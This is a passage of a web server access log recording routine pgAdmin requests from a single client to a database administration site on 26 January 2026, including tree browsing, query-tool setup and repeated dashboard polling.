-] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:01 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/connect_server/2" [Client 84.1.26.27] [Length 295] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:01 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/initialize/sqleditor/3857941/1/2/16384" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:01 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:01 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:03 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:05 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:06 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/children/1" [Client 84.1.26.27] [Length 390] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/connect/1/2" [Client 84.1.26.27] [Length 314] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/static/img/pg.svg?ver=91100" [Client 84.1.26.27] [Length 1625] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/nodes/" [Client 84.1.26.27] [Length 242] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/children/1/2" [Client 84.1.26.27] [Length 232] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/static/img/coll-database.svg?ver=91100" [Client 84.1.26.27] [Length 1050] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/nodes/1/2/" [Client 84.1.26.27] [Length 461] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/static/img/coll-role.svg?ver=91100" [Client 84.1.26.27] [Length 1156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/tablespace/static/img/coll-tablespace.svg?ver=91100" [Client 84.1.26.27] [Length 534] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/nodes/1/2/" [Client 84.1.26.27] [Length 315] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/static/img/group.svg?ver=91100" [Client 84.1.26.27] [Length 1696] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/static/img/database.svg?ver=91100" [Client 84.1.26.27] [Length 899] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/static/img/databasebad.svg?ver=91100" [Client 84.1.26.27] [Length 1156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/static/img/role.svg?ver=91100" [Client 84.1.26.27] [Length 667] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/children/1/2/16384" [Client 84.1.26.27] [Length 435] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/cast/static/img/coll-cast.svg?ver=91100" [Client 84.1.26.27] [Length 1721] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/nodes/1/2/16384/" [Client 84.1.26.27] [Length 476] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/extension/static/img/coll-extension.svg?ver=91100" [Client 84.1.26.27] [Length 1236] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/catalog/static/img/coll-catalog.svg?ver=91100" [Client 84.1.26.27] [Length 1163] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/foreign_data_wrapper/static/img/coll-foreign_data_wrapper.svg?ver=91100" [Client 84.1.26.27] [Length 1403] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/language/static/img/coll-language.svg?ver=91100" [Client 84.1.26.27] [Length 520] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/event_trigger/static/img/coll-event_trigger.svg?ver=91100" [Client 84.1.26.27] [Length 711] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/publication/static/img/coll-publication.svg?ver=91100" [Client 84.1.26.27] [Length 1090] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/static/img/coll-schema.svg?ver=91100" [Client 84.1.26.27] [Length 1159] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/subscription/static/img/coll-subscription.svg?ver=91100" [Client 84.1.26.27] [Length 1154] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/static/img/schema.svg?ver=91100" [Client 84.1.26.27] [Length 515] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/children/1/2/16384/16390" [Client 84.1.26.27] [Length 624] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/children/1/2/16384/2200" [Client 84.1.26.27] [Length 621] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/table/nodes/1/2/16384/16390/" [Client 84.1.26.27] [Length 650] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/aggregate/static/img/coll-aggregate.svg?ver=91100" [Client 84.1.26.27] [Length 1408] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/domain/static/img/coll-domain.svg?ver=91100" [Client 84.1.26.27] [Length 1266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/collation/static/img/coll-collation.svg?ver=91100" [Client 84.1.26.27] [Length 667] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_dictionary/static/img/coll-fts_dictionary.svg?ver=91100" [Client 84.1.26.27] [Length 805] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_configuration/static/img/coll-fts_configuration.svg?ver=91100" [Client 84.1.26.27] [Length 1922] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/operator/static/img/coll-operator.svg?ver=91100" [Client 84.1.26.27] [Length 875] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/procedure/static/img/coll-procedure.svg?ver=91100" [Client 84.1.26.27] [Length 4249] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_template/static/img/coll-fts_template.svg?ver=91100" [Client 84.1.26.27] [Length 583] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/mview/static/img/coll-mview.svg?ver=91100" [Client 84.1.26.27] [Length 790] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/function/static/img/coll-function.svg?ver=91100" [Client 84.1.26.27] [Length 4534] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/sequence/static/img/coll-sequence.svg?ver=91100" [Client 84.1.26.27] [Length 426] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_parser/static/img/coll-fts_parser.svg?ver=91100" [Client 84.1.26.27] [Length 326] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/foreign_table/static/img/coll-foreign_table.svg?ver=91100" [Client 84.1.26.27] [Length 1585] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/table/static/img/coll-table.svg?ver=91100" [Client 84.1.26.27] [Length 1258] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/trigger_function/static/img/coll-trigger_function.svg?ver=91100" [Client 84.1.26.27] [Length 4424] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/type/static/img/coll-type.svg?ver=91100" [Client 84.1.26.27] [Length 691] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/view/static/img/coll-view.svg?ver=91100" [Client 84.1.26.27] [Length 504] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:07 +0000] - 200 200 - GET https db.profibot.hu "/browser/table/static/img/table.svg?ver=91100" [Client 84.1.26.27] [Length 909] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[26/Jan/2026:09:37:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:24 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_tree_state/" [Client 84.1.26.27] [Length 63] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:24 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tree_state/" [Client 84.1.26.27] [Length 429] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:37:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:38:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 264] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 